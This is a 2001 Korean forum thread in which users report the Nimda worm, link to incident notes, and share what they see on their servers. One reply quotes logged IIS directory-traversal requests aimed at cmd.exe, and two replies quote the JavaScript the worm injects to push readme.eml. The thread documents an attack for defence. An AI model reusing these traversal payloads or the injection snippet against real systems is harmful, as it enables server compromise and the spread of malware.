현재 위치

›› Forums ›› 재미 ›› 자유 게시판

님다 바이러스 출현. - 현재 네트웍이 느린이유 -_-;

익명 사용자의 이미지
글쓴이: 익명 사용자 / 작성시간: 수, 2001/09/19 - 10:50오전

모든 네트웍이 느립니다 -_-;

http//www.securityfocus.com/templates/article.html?id=253

이메일을 여실때 첨부파일을 클릭하지 마십시오-.-;

Forums: 
자유 게시판
익명 사용자의 이미지

글쓴이: 익명 사용자 / 작성시간: 수, 2001/09/19 - 11:03오전

어떤 바이러스인지 감도 안잡혔는데 뜻밖에 정보를 주셔서 감사.

특이하게도 터보백신과 v3백신에서는 검출 자체를 못하던데 어찌된 일인지 )

아무튼 수고하세영

익명 사용자의 이미지

글쓴이: 익명 사용자 / 작성시간: 수, 2001/09/19 - 12:27오후

Nimda Worm(W32/Nimda worm)에 대한 보고가 올라와 있네요.
http//www.certcc.or.kr/paper/incident_note/2001/in2001_015.html
에 가셔서 보세요.
------------------------------------------------------------------
장난 아니더군요.
온통 웹 관련 로그가 이상한 거 뿐이던데..
웹을 공격하는 방식인가 보네요..

"GET /scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 303
"GET /scripts/..%c0%2f../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 303
"GET /scripts/..%c0%af../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 303
"GET /scripts/..%c1%9c../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 303
"GET /scripts/..%%35%63../winnt/system32
/cmd.exe?/c+dir HTTP/1.0" 400 287
"GET /scripts/..%%35c../winnt/system32/c
md.exe?/c+dir HTTP/1.0" 400 287

뭐 이런 식으로 다 뒤져 보네요.
보통 한 사이트에서 10개 이상의 리퀘스를 때립니다.

그리고 저희 사이트로 온 사이트에 방문했더니만..
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
이런식으로 저장 창을 뛰우던데..
취소했는데, 바이러스 걸린 거는 아니겠죠.

아무튼 난리입니다.

익명 사용자의 이미지

글쓴이: 익명 사용자 / 작성시간: 수, 2001/09/19 - 2:08오후

다음은 certcc에서 퍼온 내용입니다.
-----------------------------------
감염된시스템은 취약점을 스캔하여 발견된 서버로 Nimda 코드를 전송하며, 서버시스템이 일단 감염되면 시스템의 모든 디렉토리를 감염시킨다(파일공유를 통한 엑세스 가능한 모든 파일을 포함). "README.EML" 이름을 사용해서 디스크 자체에 카피한다. 또한 감염된 시스템의 모든 로컬 드라이브 (CD-ROM 드라이브 포함)가 공유되므로 보안상 문제가 될 수 있다. 웹컨텐츠를 포함한 디렉토리가 발견되었을 때, 다음의 Javascript 코드가 웹관련파일에 추가된다.

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

꼬랑지. 감염되셨군요 -_-

익명 사용자의 이미지

글쓴이: 익명 사용자 / 작성시간: 수, 2001/09/19 - 3:53오후

흠 저도 이넘이 어제 저녁10시부터 초당 수십개의 로그를 뿌리며 지금까지 리눅스머신을 괴롭히고 있군요.
로그기록을 보니 작년10월에 발견된버그를 공격시작하여 코드레드백도어부터..별별 군데를 이잡듯쑤시는군요.
코드레드의 로그는 얼마안되는데 이넘은 기본이 20줄정도가 되는군요.
이넘을 어드렇게 처리하나 고민중이군요.
이정도의 수준이라면 서버다운도 가능하리라 생각이-_-;
역시 DoS공격은 랜선을 뽑는길밖에 없는것인지...

둘러보기